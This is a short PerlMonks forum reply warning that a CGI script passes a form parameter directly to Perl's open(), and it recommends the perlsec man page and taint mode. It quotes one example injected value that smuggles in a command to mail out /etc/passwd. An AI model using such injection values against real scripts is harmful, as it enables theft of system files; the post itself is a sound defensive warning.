Don't ask to ask, just ask | |
PerlMonks |
DANGER!by Fastolfe (Vicar) |
on Jun 09, 2000 at 03:01 UTC ( [id://17243]=note: print w/replies, xml ) | Need Help?? |
Please read the 'perlsec' man page. You are doing a very dangerous open() call, passing the argument from your HTML form 'name' parameter directly to open. Thus, I can pass an argument of "mail me@example.com </etc/passwd; cat whatever |" and no one would be the wiser. It's not hard to change this into something considerably more destructive. Please consider running CGI apps with the -T and -w flags, which would catch major security issues like this. The 'perlsec' man page gives more detail.
In Section
Seekers of Perl Wisdom
|
|